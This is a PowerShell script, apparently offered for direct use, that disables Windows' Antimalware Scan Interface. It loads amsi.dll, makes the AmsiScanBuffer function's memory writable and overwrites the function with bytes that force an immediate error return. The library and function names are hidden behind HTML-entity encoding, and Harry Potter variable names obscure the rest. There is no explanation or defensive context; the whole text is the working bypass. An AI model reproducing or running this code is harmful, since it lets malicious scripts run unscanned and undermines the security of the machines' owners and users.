$POTTERGEIST = @"
using System;
using System.Runtime.InteropServices;
public class POTTERGEIST {
    [DllImport("kernel32")]
    public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
    [DllImport("kernel32")]
    public static extern IntPtr LoadLibrary(string name);
    [DllImport("kernel32")]
    public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);
}
"@

Add-Type $POTTERGEIST

$VOLDY = [POTTERGEIST]::LoadLibrary("$([SYstem.Net.wEBUtIlITy]::HTmldecoDE('&#97;&#109;&#115;&#105;&#46;&#100;&#108;&#108;'))")
$RON = [POTTERGEIST]::GetProcAddress($VOLDY, "$([systeM.neT.webUtility]::HtMldECoDE('&#65;&#109;&#115;&#105;&#83;&#99;&#97;&#110;&#66;&#117;&#102;&#102;&#101;&#114;'))")
$p = 0
[POTTERGEIST]::VirtualProtect($RON, [uint32]5, 0x40, [ref]$p)
$HERMIONS = "0xB8"
$ASDWR = "0x57"
$AADWFTG = "0x00"
$RTGBHJM = "0x07"
$ERFVBBNM = "0x80"
$LETSGOSKI = "0xC3"
$FIUSMASCG = [Byte[]] ($HERMIONS,$ASDWR,$AADWFTG,$RTGBHJM,+$ERFVBBNM,+$LETSGOSKI)
[System.Runtime.InteropServices.Marshal]::Copy($FIUSMASCG, 0, $RON, 6)
